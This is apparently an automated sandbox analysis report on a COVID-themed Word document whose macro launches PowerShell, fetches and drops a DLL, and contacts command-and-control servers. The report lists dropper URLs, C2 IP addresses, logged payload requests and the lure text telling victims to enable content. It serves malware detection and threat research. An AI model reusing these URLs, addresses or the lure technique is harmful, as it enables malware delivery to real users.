Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: global trafficDNS query: name: remediis.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49168 -> 71.72.196.159:80
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: https://www.starlingtechs.com/GNM/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: global trafficHTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
Source: global trafficHTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: remediis.com
Source: unknownHTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://avadnansahin.com
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: https://remediis.com
Source: powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmpString found in binary or memory: https://remediis.comp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: https://www.starlingtechs.com/GNM/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 5321
Source: unknownProcess created: Commandline size = 5220
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5220Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Giyrh\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00272E055_2_000007FF00272E05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100190367_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001307D7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016A8F7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100018B27_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100082BB7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008B587_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B1617_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D96D7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1847_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BFAF7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019FCB7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095D07_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C2017_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001440A7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000740C7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100092117_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D6137_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E8137_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B82E7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CE337_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A23E7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100154497_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001264A7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001364E7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100020557_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001665D7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005C617_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100054777_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001467C7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001E847_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100194967_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000169C7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100108A97_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084B37_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018CB57_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100122BB7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A4BD7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014EC07_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007EC47_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0C97_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E6D47_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100052D97_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C4D97_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002CE27_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D6E67_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068E67_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012EE87_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BAED7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DAEC7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038F17_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006EF47_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100163187_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100197247_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B32E7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100041377_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000673B7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001AB3D7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005F4C7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100105507_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D607_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015B6D7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100057787_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D3857_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100189897_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100149887_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ED987_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000319D7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB9F7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B9C07_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100099C37_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009FCC7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000FFD47_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F9D87_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F5DC7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100161E67_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010FEF7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E1F17_2_1000E1F1
Source: XP-9743 Medical report COVID-19.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Kyl0l3rqw280c6ssa, Function Document_openName: Document_open
Source: XP-9743 Medical report COVID-19.docOLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.evad.winDOC@26/7@2/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$-9743 Medical report COVID-19.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmpJump to behavior
Source: XP-9743 Medical report COVID-19.docOLE indicator, Word Document stream: true
Source: XP-9743 Medical report COVID-19.docOLE document summary: title field not present or empty
Source: XP-9743 Medical report COVID-19.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............d........................... .V.......V.....................H...............#...............................h.......5kU.............Jump to behavior
Source: C:\Windows\System32\msg.exeConsole Write: ............d...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v.....,......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v.... -......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v.....9......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....x.j...............u.............}..v....x:......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............M..j......................u.............}..v.... h......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............M..j..... u...............u.............}..v.....h......0...............H.j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......................u.............}..v.... .......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......................u.............}..v.... .......0................Hj.............................Jump to behavior
